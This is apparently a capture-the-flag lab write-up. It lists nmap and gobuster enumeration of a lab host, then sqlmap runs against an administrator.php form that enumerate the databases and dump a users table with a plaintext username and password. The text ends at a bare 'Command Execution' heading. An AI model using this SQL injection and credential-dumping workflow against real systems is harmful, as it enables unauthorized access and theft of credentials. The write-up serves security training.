Tools & Commands

2 - Enumeration

$ nmap 10.10.249.70 -v
22/tcp open  ssh
80/tcp open  http

$ nmap 10.10.249.70 -v -A -p22,80
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6d:2c:40:1b:6c:15:7c:fc:bf:9b:55:22:61:2a:56:fc (RSA)
|   256 ff:89:32:98:f4:77:9c:09:39:f5:af:4a:4f:08:d6:f5 (ECDSA)
|_  256 89:92:63:e7:1d:2b:3a:af:6c:f9:39:56:5b:55:7e:f9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

3 - Web Enumeration

$ gobuster dir -u 10.10.249.70 -w /usr/share/wordlists/dirb/big.txt -x "php,txt"

4 - Web Exploitation

$ sqlmap -u http://10.10.239.224/administrator.php --forms --dbs
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] users

$ sqlmap -u http://10.10.239.224/administrator.php --forms -D users --tables
Database: users
[1 table]
+-------+
| users |
+-------+

$ sqlmap -u http://10.10.239.224/administrator.php --forms -D users -T users --columns
Database: users
Table: users
[2 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(100) |
| username | varchar(100) |
+----------+--------------+

$ sqlmap -u http://10.10.239.224/administrator.php --forms -D users -T users --dump
Database: users
Table: users
[1 entry]
+----------+------------+
| username | password   |
+----------+------------+
| pingudad | secretpass |
+----------+------------+

5 - Command Execution

Log in with the credentials dumped above.